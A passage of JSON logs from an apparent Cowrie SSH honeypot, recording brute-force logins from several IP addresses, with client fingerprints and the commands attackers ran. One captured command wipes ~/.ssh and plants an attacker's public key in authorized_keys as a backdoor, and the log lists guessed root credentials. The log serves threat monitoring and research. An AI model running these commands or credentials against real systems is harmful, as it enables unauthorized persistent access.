~","sensor":"my-vps","timestamp":"2025-09-08T23:34:48.723161Z","src_ip":"212.227.235.229","session":"b20ba28386e6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:34:49.463533Z","src_ip":"212.227.235.229","session":"b20ba28386e6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:34:49.464542Z","src_ip":"212.227.235.229","session":"b20ba28386e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48012,"dst_ip":"1.2.3.4","dst_port":22,"session":"19564619f91e","protocol":"ssh","message":"New connection: 212.227.235.229:48012 (1.2.3.4:22) [session: 19564619f91e]","sensor":"my-vps","timestamp":"2025-09-08T23:34:49.783787Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:34:49.784433Z","src_ip":"212.227.235.229","session":"19564619f91e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:34:50.101337Z","src_ip":"212.227.235.229","session":"19564619f91e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:34:51.408325Z","src_ip":"212.227.235.229","session":"19564619f91e"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:34:52.727201Z","src_ip":"212.227.235.229","session":"19564619f91e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48022,"dst_ip":"1.2.3.4","dst_port":22,"session":"47f23d68881d","protocol":"ssh","message":"New connection: 212.227.235.229:48022 (1.2.3.4:22) [session: 47f23d68881d]","sensor":"my-vps","timestamp":"2025-09-08T23:34:53.042834Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:34:53.043731Z","src_ip":"212.227.235.229","session":"47f23d68881d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:34:53.359710Z","src_ip":"212.227.235.229","session":"47f23d68881d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:34:54.993899Z","src_ip":"212.227.235.229","session":"47f23d68881d"}
{"eventid":"cowrie.session.closed","duration":"10.1","message":"Connection lost after 10.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:34:55.307862Z","src_ip":"212.227.235.229","session":"b20ba28386e6"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:34:55.311975Z","src_ip":"212.227.235.229","session":"47f23d68881d"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":44302,"dst_ip":"1.2.3.4","dst_port":22,"session":"272626f92239","protocol":"ssh","message":"New connection: 93.113.63.124:44302 (1.2.3.4:22) [session: 272626f92239]","sensor":"my-vps","timestamp":"2025-09-08T23:35:02.571301Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:35:02.572220Z","src_ip":"93.113.63.124","session":"272626f92239"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:35:02.643499Z","src_ip":"93.113.63.124","session":"272626f92239"}
{"eventid":"cowrie.login.failed","username":"ibrahim","password":"Welcome1","message":"login attempt [ibrahim/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-08T23:35:03.140604Z","src_ip":"93.113.63.124","session":"272626f92239"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":35180,"dst_ip":"1.2.3.4","dst_port":22,"session":"c68b59789fa0","protocol":"ssh","message":"New connection: 182.18.161.165:35180 (1.2.3.4:22) [session: c68b59789fa0]","sensor":"my-vps","timestamp":"2025-09-08T23:35:03.706779Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:35:03.707970Z","src_ip":"182.18.161.165","session":"c68b59789fa0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:35:03.957972Z","src_ip":"182.18.161.165","session":"c68b59789fa0"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:35:04.212254Z","src_ip":"93.113.63.124","session":"272626f92239"}
{"eventid":"cowrie.login.success","username":"root","password":"Avatar","message":"login attempt [root/Avatar] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:35:04.997339Z","src_ip":"182.18.161.165","session":"c68b59789fa0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:35:05.514175Z","src_ip":"182.18.161.165","session":"c68b59789fa0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:35:05.514884Z","src_ip":"182.18.161.165","session":"c68b59789fa0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:35:05.516180Z","src_ip":"182.18.161.165","session":"c68b59789fa0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:35:05.767245Z","src_ip":"182.18.161.165","session":"c68b59789fa0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:35:06.384760Z","src_ip":"182.18.161.165","session":"c68b59789fa0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:35:06.385435Z","src_ip":"182.18.161.165","session":"c68b59789fa0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:35:06.637178Z","src_ip":"182.18.161.165","session":"c68b59789fa0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:35:06.638135Z","src_ip":"182.18.161.165","session":"c68b59789fa0"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":35196,"dst_ip":"1.2.3.4","dst_port":22,"session":"40448e24093a","protocol":"ssh","message":"New connection: 182.18.161.165:35196 (1.2.3.4:22) [session: 40448e24093a]","sensor":"my-vps","timestamp":"2025-09-08T23:35:06.898509Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:35:06.900247Z","src_ip":"182.18.161.165","session":"40448e24093a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:35:07.153715Z","src_ip":"182.18.161.165","session":"40448e24093a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:35:08.207922Z","src_ip":"182.18.161.165","session":"40448e24093a"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:35:09.464332Z","src_ip":"182.18.161.165","session":"40448e24093a"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":56646,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bdd72455b95","protocol":"ssh","message":"New connection: 182.18.161.165:56646 (1.2.3.4:22) [session: 6bdd72455b95]","sensor":"my-vps","timestamp":"2025-09-08T23:35:09.700031Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:35:09.700866Z","src_ip":"182.18.161.165","session":"6bdd72455b95"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:35:09.945431Z","src_ip":"182.18.161.165","session":"6bdd72455b95"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:35:10.965240Z","src_ip":"182.18.161.165","session":"6bdd72455b95"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:35:11.212599Z","src_ip":"182.18.161.165","session":"c68b59789fa0"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:35:11.213531Z","src_ip":"182.18.161.165","session":"6bdd72455b95"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":38836,"dst_ip":"1.2.3.4","dst_port":22,"session":"c167b6b8b19c","protocol":"ssh","message":"New connection: 46.101.8.63:38836 (1.2.3.4:22) [session: c167b6b8b19c]","sensor":"my-vps","timestamp":"2025-09-08T23:35:11.604439Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:35:11.605565Z","src_ip":"46.101.8.63","session":"c167b6b8b19c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:35:11.629270Z","src_ip":"46.101.8.63","session":"c167b6b8b19c"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T23:35:11.764200Z","src_ip":"46.101.8.63","session":"c167b6b8b19c"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:35:12.790935Z","src_ip":"46.101.8.63","session":"c167b6b8b19c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":6103,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd90b971d521","protocol":"ssh","message":"New connection: 212.227.125.160:6103 (1.2.3.4:22) [session: cd90b971d521]","sensor":"my-vps","timestamp":"2025-09-08T23:35:55.587949Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-09-08T23:35:55.690456Z","src_ip":"212.227.125.160","session":"cd90b971d521"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-09-08T23:35:55.810510Z","src_ip":"212.227.125.160","session":"cd90b971d521"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-